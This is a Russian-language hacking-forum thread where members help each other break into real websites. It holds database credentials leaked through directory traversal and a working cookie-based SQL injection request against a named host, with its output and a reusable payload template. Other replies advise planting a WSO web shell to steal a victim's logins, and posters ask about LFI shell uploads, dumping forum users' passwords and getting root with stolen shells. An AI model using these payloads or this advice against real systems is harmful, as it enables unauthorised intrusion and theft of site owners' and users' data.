Ваши вопросы по уязвимостям.

panfilov1991, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри

 

погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)

 

Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).
Нашел следующий скрипт sql.php:

Code:

<?php
$sql_usr 	= "megaadmin";
$sql_passwd 	= "blueavatar";
$sql_ip 	= "127.0.0.1";
$sql_name 	= "all";
$sql_charset 	= "utf8";
$memcache_host 	= "localhost";
$memcache_port 	= 65000;
?>

Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?
Спасибо

 

zloy_fantom, только если есть шел на уязвимой машине

 

Кто может подсказать по xss. Напишите пожалуйста в личку.

 

В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!

 

panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!

 

Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта



экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.

 

Пожалуйста

 

Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

Все отлично работает, запрос переделал, мне так удобнее...

Code:

Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

Версия - 5.5.29-1-log
Названия Базы Данных - s10parl

"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА

З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!

 

А если такой вариант:
На той-же машине, что и сервер, развернут сервер openvpn, ко внутренней сети которого я подключился как клиент. На паре машин этой сети открыты порты snmp, mysql и ssh. snmp видна просто как расшаренные папки, но в них ничего интересного. По ssh подключение доступно через putty, знать-бы пароль root... А вот есть-ли способы подключиться к mysql тем-же макаром? Какой софт нужен для этого?
Спасибо

Зарегистрировался, а вот как посмотреть, какие данные для доступа к БД они предоставляют, не понял. Зайти под теми данными попробую (дождусь только, когда админ разлогинится), только что мне это даст? Я ведь все равно не смогу шелл загрузить...Или смогу? Короче, надо пробовать, может будет доступна панель управления или редактирования....
Спасибо

 

Подойдет WSO, заливаешь его на сервак где хостится сайт жертвы и пробуешь подключиться, если подключится, то там уже можешь попробовать выдернуть логин:пасс жертвы, если повезет то дальше продолжаешь уже через админку жертвы...

 

Не получается: wso положил в расшаренную папку внутренней сети, но каков путь к ней в подсистеме сервера, я не знаю, т.е., через интерпретатор PHP wso не достать

 

Срочно! Нужна помощь с заливкой шелла!

Есть сайт с LFI но у меня очень мало опыта с данным типом уязвимостей, потому и прошу помощи у вас, более продвинутых в этой теме. Что и как нужно делать, читал, смотрел видео но что-то никак не получается(((

Кто может почь, пишите сюда или в ЛС.

Или хотяб дайте подробнейший мануал и/или видео по заливки шелла через LFI.

 

Ну когда же вы научитесь самостоятельно искать инфу?! ладно...
заходим в раздел
Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд и внимательно изучаете в ней нужные вам аспекты!
а точнее ткну пальцем!
статьи по PHP инклудам:
php injection
Автор GreenBear
TRUE PHP-injection
Автор Zadoxlik
PHP-include и способы защиты
Автор _Pantera_
[новый способ] замена нулл-байту в инклудах
Автор [Raz0r]
Логи и конфиги:
Default *log, *conf files locations
respect ettee

 

phpinfo

здрасте
уменя естъ phpinfo() от крупного сайта...
только спомощю phpinfo() я смогу етот сайт ломатъ?
и как?
можте кто нибудъ нопомч мне?

 

Нет не сможите!, phpinfo() выводи инфу о настройках апача и мелкой тароблы не болие того!

 

Возможно сформировать запрос так чтоб скрипт выдал

Code:

query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";

?

PHP:

require_once('../../../wp-config.php');
require_once('../../../wp-includes/functions.php');
 
// CSRF attack protection. Check the Referal field to be the same
// domain of the script
 
$k_id = strip_tags($wpdb->escape($_GET['id']));
$k_action = strip_tags($wpdb->escape($_GET['action']));
$k_path = strip_tags($wpdb->escape($_GET['path']));
$k_imgIndex = strip_tags($wpdb->escape($_GET['imgIndex']));
 
// prevent SQL injection
if (!is_numeric($k_id)) die('error|Query error');
 
$table_name = $wpdb->prefix . 'comment_rating';
$comment_table_name = $wpdb->prefix . 'comments';
 
if($k_id && $k_action && $k_path) {
    //Check to see if the comment id exists and grab the rating
    $query = "SELECT * FROM `$table_name` WHERE ck_comment_id = $k_id";
    $result = mysql_query($query);
 
        if(!$result) { die('error|mysql: '.mysql_error()); }
       
   if(mysql_num_rows($result))
        {
      $duplicated = 0;  // used as a counter to off set duplicated votes
      if($row = @mysql_fetch_assoc($result))
      {
         // Handle proxy with original IP address
         $ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
         if(strstr($row['ck_ips'], $ip)) {
            // die('error|You have already voted on this item!');
            // Just don't count duplicated votes
            $duplicated = 1;
            $ck_ips = $row['ck_ips'];
         }
         else {
            $ck_ips = $row['ck_ips'] . ',' . $ip; // IPs are separated by ','
         }
      }
               
      $total = $row['ck_rating_up'] - $row['ck_rating_down'];
      if($k_action == 'add') {
         $rating = $row['ck_rating_up'] + 1 - $duplicated;
         $direction = 'up';
         $total = $total + 1 - $duplicated;
      }
      elseif($k_action == 'subtract')
      {
         $rating = $row['ck_rating_down'] + 1 - $duplicated;
         $direction = 'down';
         $total = $total - 1 + $duplicated;
      } else {
            die('error|Try again later'); //No action given.
      }
               
      if (!$duplicated)
      {
         $query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";
         $result = mysql_query($query);
         if(!$result)
         {
            // die('error|query '.$query);
            die('error|Query error');
         }
         
         // Now duplicated votes will not
         if(!mysql_affected_rows())
         {
            die('error|affected '. $rating);
         }
         
         $karma_modified = 0;
         if (get_option('ckrating_karma_type') == 'likes' && $k_action == 'add') {
            $karma_modified = 1; $karma = $rating;
         }
         if (get_option('ckrating_karma_type') == 'dislikes' && $k_action == 'subtract') {
            $karma_modified = 1; $karma = $rating;
         }
         if (get_option('ckrating_karma_type') == 'both') {
            $karma_modified = 1; $karma = $total;
         }
 
         if ($karma_modified) {
            $query = "UPDATE `$comment_table_name` SET comment_karma = '$karma' WHERE comment_ID = $k_id";
            $result = mysql_query($query);
            if(!$result) die('error|Comment Query error');
         }
 
         // Invalidate the W3 cache by triggering the global wordpress action hook for an edited comment
         do_action("edit_comment", $k_id);
      }
   } else {
        die('error|Comment doesnt exist'); //Comment id not found in db, something wrong ?
   }
} else {
    die('error|Fatal: html format error');
}
 
// Add the + sign,
if ($total > 0) { $total = "+$total"; }
 
//This sends the data back to the js to process and show on the page
// The dummy field will separate out any potential garbage that
// WP-superCache may attached to the end of the return.
echo("done|$k_id|$rating|$k_path|$direction|$total|$k_imgIndex|dummy");
?>

 

И снова всем привет!
Вот у меня возникла такая проблемка, есть сайт с форумом IPB 2.3.5 на сайте есть sql-injection, довольно быстро получил доступ к БД и сразу же начал дампить данные юзеров форума. И тут получился весь облом. Вся соль в том что есть колонка name, email и т.п. а вот password - нету. Вопрос: где админ мог скрыть пароли юзеров и как?

 

Кто может подробнее обьяснить как компилить запускать exploit?Где качать pyton и т.д.Буду очень благодарен.Есть большое количество шелов.Хотелось бы попробовать получить root.